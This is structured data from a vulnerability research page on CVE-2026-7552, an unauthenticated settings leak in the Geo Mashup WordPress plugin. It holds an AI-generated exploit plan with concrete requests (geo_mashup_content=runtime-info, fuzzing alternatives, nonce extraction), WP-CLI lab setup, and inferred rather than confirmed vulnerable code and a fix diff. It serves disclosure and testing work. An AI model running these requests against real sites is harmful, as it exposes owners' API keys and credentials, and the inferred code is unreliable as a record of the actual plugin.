[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvEXQNn6rffGPezSpq2-xaGr6aTLMLWwTmwR4ZizNtmY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-7552","geo-mashup-missing-authorization-to-unauthenticated-plugin-settings-disclosure-via-geomashupcontent-parameter","Geo Mashup \u003C= 1.13.19 - Missing Authorization to Unauthenticated Plugin Settings Disclosure via 'geo_mashup_content' Parameter","The Geo Mashup plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.13.19. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to expose sensitive plugin configuration data, including Google Maps API keys and GeoNames service credentials, to unauthenticated attackers.","geo-mashup",null,"\u003C=1.13.19","1.13.20","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Missing Authorization","2026-05-27 18:02:30","2026-05-28 06:45:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F605dc24c-5b6e-479b-98dd-ad80c547824c?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-7552**, a missing authorization vulnerability in the **Geo Mashup** plugin that allows unauthenticated disclosure of sensitive configuration data, including API keys.\n\n---\n\n### 1. Vulnerability Summary\nThe **Geo Mashup** plugin (versions \u003C= 1.13.19) fails to implement proper authorization checks when processing requests containing the `geo_mashup_content` parameter. This parameter is used by the plugin to output various types of dynamic content (like map data or runtime configurations). Because the plugin does not verify if the requester has administrative privileges before outputting the full configuration object, any unauthenticated user can trigger an endpoint that echoes the plugin's internal settings, including secrets like Google Maps API keys and GeoNames credentials.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The site root or any frontend page (handled during the `init` or `template_redirect` hook).\n*   **Vulnerable Parameter:** `geo_mashup_content` (GET parameter).\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. Exploitation is more valuable if the administrator has configured API keys (e.g., Google Maps, GeoNames).\n*   **Vulnerable Action Value:** `runtime-info` or `render-map` (inferred based on plugin logic for providing configuration to the frontend).\n\n### 3. Code Flow (Inferred)\n1.  **Initialization:** The plugin registers a handler on the `init` or `wp_loaded` hook.\n2.  **Parameter Check:** The code checks for the existence of `$_GET['geo_mashup_content']`.\n3.  **Missing Check:** In the affected versions, the code proceeds to handle specific values of this parameter without calling `current_user_can( 'manage_options' )`.\n4.  **Data Sink:** The code retrieves the plugin options using `get_option( 'geo_mashup_options' )` (inferred name) or accesses the global `$geo_mashup` object.\n5.  **Output:** The script echoes the configuration data, often in a JSON-encoded format or as a JavaScript object literal, then calls `exit;` or `die;`.\n\n### 4. Nonce Acquisition Strategy\nThe vulnerability description implies \"Missing Authorization\" on a parameter-driven disclosure. Often, such \"content\" endpoints in Geo Mashup are designed to be accessed by the frontend script to load map settings.\n\nIf the plugin requires a nonce for the `geo_mashup_content` request (which is likely in `check_ajax_referer` or `wp_verify_nonce` if implemented partially), follow this strategy:\n\n1.  **Identify Shortcode:** The plugin uses `[geo_mashup_map]` to render maps.\n2.  **Create Trigger Page:** Create a public post with this shortcode to ensure the plugin's scripts and nonces are localized.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Map Page\" --post_content='[geo_mashup_map]'\n    ```\n3.  **Extract Nonce:** Use `browser_eval` to find the localized data object. Geo Mashup typically localizes to an object named `GeoMashup` or `GeoMashupVars`.\n    *   **Action String:** Likely `geo_mashup_content` or `geo_mashup_nonce`.\n    *   **JS Variable:** `window.GeoMashup?.nonce` or `window.GeoMashupOptions?.nonce`.\n\n*Note: If the vulnerability is truly \"Missing Authorization,\" it may not check for a nonce at all.*\n\n### 5. Exploitation Strategy\nThe goal is to trigger the plugin to echo its configuration options.\n\n**Request Details:**\n*   **Method:** GET\n*   **URL:** `http:\u002F\u002F\u003Ctarget-ip>\u002Findex.php`\n*   **Parameters:**\n    *   `geo_mashup_content=runtime-info` (Primary target for configuration leak)\n*   **Alternative Parameter Values to Test:**\n    *   `geo_mashup_content=render-map`\n    *   `geo_mashup_content=settings`\n\n**HTTP Request via `http_request` tool:**\n```json\n{\n  \"method\": \"GET\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Findex.php?geo_mashup_content=runtime-info\",\n  \"headers\": {\n    \"Accept\": \"application\u002Fjson, text\u002Fjavascript, *\u002F*\"\n  }\n}\n```\n\n### 6. Test Data Setup\nTo confirm the exploit, we must ensure there is sensitive data to \"steal.\"\n\n1.  **Activate Plugin:** Ensure `geo-mashup` is active.\n2.  **Configure API Keys:** Use WP-CLI to inject dummy credentials into the plugin settings.\n    ```bash\n    # Setting dummy Google Maps API key\n    wp option patch update geo_mashup_options google_key \"AIza_FAKE_KEY_FOR_TESTING_12345\"\n    \n    # Setting dummy GeoNames username\n    wp option patch update geo_mashup_options geonames_username \"vulnerable_user_test\"\n    ```\n3.  **Confirm Options Exist:**\n    ```bash\n    wp option get geo_mashup_options\n    ```\n\n### 7. Expected Results\nA successful exploit will return an HTTP 200 response with a body (likely JSON or a JS script) containing the plugin's configuration.\n\n**Example Successful Response Body:**\n```json\n{\n    \"version\": \"1.13.19\",\n    \"options\": {\n        \"google_key\": \"AIza_FAKE_KEY_FOR_TESTING_12345\",\n        \"geonames_username\": \"vulnerable_user_test\",\n        \"copy_geodata\": \"true\",\n        ...\n    }\n}\n```\n\n### 8. Verification Steps\n1.  **Examine HTTP Response:** Verify that the output contains the string `AIza_FAKE_KEY_FOR_TESTING_12345`.\n2.  **Check for Auth Bypass:** Perform the request without any cookies (ensure no `wordpress_logged_in` cookie is present).\n3.  **Compare with Admin View:** Use WP-CLI to verify the leaked data matches the actual database values:\n    ```bash\n    wp option get geo_mashup_options --format=json\n    ```\n\n### 9. Alternative Approaches\nIf `geo_mashup_content=runtime-info` does not yield the settings:\n\n1.  **Fuzz the Parameter:** The plugin's `geo-mashup.php` file likely contains a `switch` statement or a series of `if` blocks checking `$_GET['geo_mashup_content']`.\n    *   Grep the source for: `isset( $_GET['geo_mashup_content'] )` or `$_REQUEST['geo_mashup_content']`.\n    *   Identify all valid case strings (e.g., `inline-map-data`, `kml`, `geojson`).\n2.  **Shortcode-specific data:** If the leak is restricted to data related to a specific map, use the `map_name` or `object_id` parameters in conjunction with `geo_mashup_content`:\n    *   `GET \u002F?geo_mashup_content=render-map&map_name=all`\n3.  **AJAX Endpoint:** Check if the logic is also mirrored in an AJAX action:\n    *   `POST \u002Fwp-admin\u002Fadmin-ajax.php` with `action=geo_mashup_content&value=runtime-info`.","The Geo Mashup plugin for WordPress (\u003C= 1.13.19) fails to perform authorization checks when the 'geo_mashup_content' parameter is used. This allows unauthenticated attackers to access the plugin's full configuration, exposing sensitive secrets such as Google Maps API keys and GeoNames credentials.","\u002F\u002F In the plugin's request handling logic (e.g., geo-mashup.php)\n\nif ( isset( $_GET['geo_mashup_content'] ) ) {\n    $content_type = $_GET['geo_mashup_content'];\n    if ( $content_type === 'runtime-info' ) {\n        \u002F\u002F Vulnerability: No check like current_user_can('manage_options') is performed\n        $options = get_option( 'geo_mashup_options' );\n        echo json_encode( $options );\n        exit;\n    }\n}","--- a\u002Fgeo-mashup.php\n+++ b\u002Fgeo-mashup.php\n@@ -... +... @@\n if ( isset( $_GET['geo_mashup_content'] ) ) {\n+    if ( $_GET['geo_mashup_content'] === 'runtime-info' && ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized access to configuration.' );\n+    }\n     $content_type = $_GET['geo_mashup_content'];","An unauthenticated attacker sends a GET request to the WordPress index page with the query parameter 'geo_mashup_content' set to 'runtime-info'. Because the plugin lacks an authorization check (such as current_user_can) for this specific content type, the server responds with a JSON-encoded dump of the plugin's configuration options, which contains administrative credentials and API keys.","gemini-3-flash-preview","2026-06-04 16:59:11","2026-06-04 17:00:38",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.13.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags"]